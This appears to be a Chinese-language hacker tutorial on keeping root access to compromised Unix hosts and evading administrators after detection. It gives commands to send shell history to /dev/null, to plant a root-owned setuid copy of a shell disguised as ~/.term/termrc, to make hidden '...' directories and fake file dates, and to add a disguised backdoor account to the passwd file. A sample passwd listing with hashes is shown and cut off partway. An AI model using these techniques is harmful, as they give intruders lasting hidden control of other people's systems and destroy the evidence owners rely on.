一些訣竅
Root和Demon的工具包及特洛伊木馬
--------------------------------------------------------------------------------
保持訪問權限的方法有很多。雖然在你學習本文時，可能正將要失去在某些主機上
的訪問權限，但我希望本文中的一些經(jīng)驗可以使你成為一名“堅固”的黑客。
一些訣竅
這里提供的一些“訣竅”可以幫助你保持在主機上的權限。一旦系統(tǒng)管理員發(fā)現(xiàn)了
你，他們會在一旁監(jiān)視你和你在該系統(tǒng)上所做的每一件事，他們還會重新編譯二進制文件
、更改每個用戶的密碼、拒絕來自你所在主機的訪問、隱藏passwd和shadow檔、檢查有
SUID的文件，等等......
如果你發(fā)現(xiàn)自己已經(jīng)暴露了，不要試圖再次闖入該系統(tǒng)。我就曾經(jīng)目睹了一些人因為
試圖通過安裝特洛伊木馬、使用其他帳號或以前所設置的“后門”再次獲取權限而被捕。
仔細想一下，他們在監(jiān)視你......你在系統(tǒng)中的一舉一動、精心設計的程序都會他們知道！
千萬不要這樣！請等待！當一個月后，他們會以為事情已經(jīng)過去而放松警惕。這時，
你就可以利用他們遺漏的系統(tǒng)漏洞之一再次進入該系統(tǒng)，并嘗試恢復你以前所做的工作。
OK。以下就是這些“訣竅”。
歷史文件：
--------------
總是把你的.bash_history文件鏈接到/dev/null。否則，至少要編輯它。記住，.bash_history
會記錄你在退出登錄前所輸入的命令。舉個例子，如果你編輯它，它就會記錄到你正在
編輯它。你或許可以在另外的shell中編輯它，但這似乎有點多余，只要把它輸出到/dev/null
就行了。
1. 如果在用戶目錄下有.bash_history文件，刪除它。
2. 在用戶根目錄下輸入命令：ln -s /dev/null .bash_history
“藏身”目錄：
-----------------
總是在系統(tǒng)找一個目錄作為你的文件的“藏身之所”。這里提供幾個大多數(shù)用戶幾乎
從來沒有瀏覽過的目錄。
在用戶根目錄中尋找.term，在該目錄下只有一個termrc可執(zhí)行文件。系統(tǒng)管理員及其同類
用戶都已慣于看到這個隱藏目錄，但幾乎從未進入此目錄。如果你們進入了這個目錄，你想
他們對此目錄下的termrc可執(zhí)行文件有何感想呢？對了。沒有。。。因為他們認為這個文件
正在它應該在的地方。
好了。讓我們把termrc變大一點，并加上suid權限。。。你明白其中的意思吧？？？我
想你能猜得到。;-) 然后切換到/bin目錄并輸入：
cp bash（或sh等之類的shell） ~username/.term/termrc
chown root ~username/.term/termrc
chgrp root~username/.term/termrc
chmod s ~username/.term/termrc
現(xiàn)在，你有一個可以隨時成為root用戶的文件，而且不易被系統(tǒng)管理員發(fā)現(xiàn)。如果你希望
做得更好一點，可以修改文件日期，使其看起來是一個“舊”文件。
另外，還有一些是每個用戶必有但卻可能從未使用過的目錄，如 .elm 、.term 、mail。你還
可以嘗試建立“...”目錄，由于它緊跟在兩個特殊目錄“.”和“..”之后，不易被察覺，因此
是簡單可行的。當用ls -al察看時，顯示如下內容：
1024 Jan 29 21:03 .
1024 Dec 28 00:12 ..
1024 Jan 29 21:03 ...
509 Mar 02 1996 .bash_history
22 Feb 20 1996 .forward
164 May 18 1996 .kermrc
34 Jun 06 1993 .less
114 Nov 23 1993 .lessrc
1024 May 18 1996 .term
1024 May 19 1996 public_html
看見它所處的位置了嗎？
但如果使用 ls -l命令，只會顯示如下內容：
1024 May 19 1996 public_html
記住，你也可以尋找一些具有很長名字的文件路徑，而且一般沒有人想進入它。
利用它來作為你的“藏身”目錄，當然，你甚至可以在那里建立“..,”目錄。;-)
制作新命令
--------------------
在你檢查cron是否已經(jīng)使用MD5加密后，你或許希望將所設計的程序復制到另一
個不同的文件以保存在系統(tǒng)中；以或者是覆蓋一個你知道從未有人使用過的命令。
復制文件時應注意修改文件日期，不然遲早系統(tǒng)管理員都將修復系統(tǒng)，使你所設計的
程序都是白費心機。
更好的方法是為所要使用的shell取另外的新名字，并使它具有suid權限。
增加或修改登錄密碼
---------------------------------
另一個可行的“后門”是在passwd檔中增加新用戶，并盡量使它看起來象是原來
就有的。盡量不要使用這個新用戶密碼，不要用它登錄，只是在你失去了原有權限時
才將它派上用場。
特點：這個用戶不必是容易引起注意的root用戶；你可以在任何需要的時候成為
root用戶。以下是一個實例：
We want to make our account look like it belongs, so lets keep to thetop of
the file.
root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash
sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt

最新評論